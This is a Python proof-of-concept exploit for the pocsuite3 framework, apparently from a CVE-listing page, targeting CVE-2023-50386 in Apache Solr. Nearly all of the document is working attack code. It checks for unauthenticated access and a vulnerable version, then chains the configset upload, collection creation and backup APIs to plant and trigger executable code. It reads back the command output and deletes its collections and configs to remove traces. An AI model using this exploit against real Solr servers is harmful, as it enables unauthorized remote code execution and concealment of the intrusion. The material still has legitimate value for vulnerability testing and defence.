4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-50386.py PY
# -*- coding: utf-8 -*-
# @Time    : 2024/2/21 20:47
# @Author  : vvmdx
# @File    : CVE-2023-50386.py
# @Project : pocsuite3

"""
POC 先判断是否需要登录,再判断版本,如果无需登录且版本在影响范围内的话,开始实施攻击,最后清理痕迹
"""
import json
import re

from pocsuite3.api import VUL_TYPE, Output, POCBase, POC_CATEGORY, register_poc, requests

class SolrPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = ['vvmdx']
    vulDate = '2024-02-09'
    createDate = '2024-02-21'
    updateDate = '2024-02-28'
    references = ['https://solr.apache.org/security.html#cve-2023-50386-apache-solr-backuprestore-apis-allow-for-deployment-of-executables-in-malicious-configsets']
    name = 'Apache Solr Backup/Restore APIs 未授权访问导致远程代码执行(CVE-2023-50386)'
    appPowerLink = 'https://solr.apache.org/'
    appName = 'Apache Solr'
    appVersion = '6.0.0 through 8.11.2\n9.0.0 before 9.4.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = ''''''
    samples = [
    ]
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    pocDesc = ''' 验证模式下判断版本,攻击模式下代码执行 '''

    def _verify(self):
        result = {}
        if self.url.endswith("/"):
            url = self.url[:-1]
        else:
            url = self.url
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
        }
        solr_url = url + "/solr/"
        resp_solr = requests.get(solr_url, headers=header, verify=False)
        zk_url = url + "/solr/admin/zookeeper"
        resp_zk = requests.get(zk_url, headers=header, verify=False)
        # 1. 是否未授权访问
        # 2. 是否为集群启动
        if resp_solr.status_code == 200 and resp_zk.status_code == 200:
            # 3. 提取版本号
            pattern = re.compile(r'href="img/favicon.ico\?_=(\d+\.\d+\.\d+)"')
            match = pattern.search(resp_solr.text)
            if match is not None:
                version_str = match[1]
                # 4. 检查版本是否在漏洞影响范围内
                if self.check_version(version_str, "6.0.0", "8.11.3") or self.check_version(version_str, "9.0.0", "9.4.1"):
                    # 5. 是的话就在漏洞范围内
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = solr_url
        return self.parse_output(result)

    def get_version_tuple(self, version_str):
        # 转为tuple方便直接比大小
        return tuple(map(int, (version_str.split("."))))

    # 检查版本是否在漏洞影响范围内
    def check_version(self, version_str, low_str, up_str):
        version = self.get_version_tuple(version_str)
        low = self.get_version_tuple(low_str)
        up = self.get_version_tuple(up_str)

        return low <= version < up

    def _attack(self):
        result = {}
        if self.url.endswith("/"):
            url = self.url[:-1]
        else:
            url = self.url
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
        }
        url = url + "/solr/admin"
        # 1. 上传压缩包conf1和conf2
        upload_url = url + "/configs?action=UPLOAD&name=conf1"
        if self.upload(upload_url, "conf1.zip"):
            # 上传成功
            # 2. 创建collection
            create_url = url + "/collections?action=CREATE&name=collection1&numShards=1&replicationFactor=1&wt=json&collection.configName=conf1"
            if self.action(create_url):
                # 创建成功
                # 3. 备份第一步
                backup_url_1 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/&name=collection2_shard1_replica_n1"
                if self.action(backup_url_1):
                    # 备份成功
                    # 4. 备份第二步
                    backup_url_2 = url + "/collections?action=BACKUP&collection=collection1&location=/var/solr/data/collection2_shard1_replica_n1&name=lib"
                    if self.action(backup_url_2):
                        # 备份成功
                        # 5. 上传conf2
                        upload_url_2 = url + "/configs?action=UPLOAD&name=conf2"
                        if self.upload(upload_url_2, "conf2.zip"):
                            # 上传成功
                            # 6. 执行
                            exec_url = url + "/collections?action=CREATE&name=collection2&numShards=1&replicationFactor=1&wt=json&collection.configName=conf2"
                            resp_exec = requests.get(exec_url, headers=header, verify=False)
                            if resp_exec.status_code == 400:
                                read_url = url + "/info/properties"
                                resp_read = requests.get(read_url, headers=header, verify=False)
                                if resp_read.status_code == 200 and "root:" in resp_read.text:
                                    # 执行成功
                                    # 7. 读取回显
                                    json_data = json.loads(resp_read.text)
                                    exec_res = json_data['system.properties']['java.library.path']
                                    result['VerifyInfo'] = {}
                                    result['VerifyInfo']['result'] = exec_res
        # 清理痕迹
        resp_del = requests.get(url + "/collections?action=DELETE&name=collection1", headers=header, verify=False)
        # 要先清理collection,config清理先后顺序无所谓
        if resp_del.status_code == 200:
            requests.get(url + "/configs?action=DELETE&name=conf1", headers=header, verify=False)
            requests.get(url + "/configs?action=DELETE&name=conf2", headers=header, verify=False)
        return self.parse_output(result)


    def action(self, action_url):
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
        }
        resp = requests.get(action_url, headers=header, verify=False)
        json_data = json.loads(resp.text)
        if resp.status_code == 200 and json_data['responseHeader']['status'] == 0 and "success" in json_data:
            return True
        return False

    def upload(self, upload_url, file_name):
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36",
            "Content-Type": "application/octet-stream"
        }
        with open(file_name, "rb") as file:
            # 直接将zip的二进制数据作为post body传
            resp = requests.post(upload_url, headers=header, data=file, verify=False)
        json_data = json.loads(resp.text)
        if resp.status_code == 200 and json_data['responseHeader']['status'] == 0:
            return True
        return False

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Target is not vulnerable')
        return output


register_poc(SolrPOC)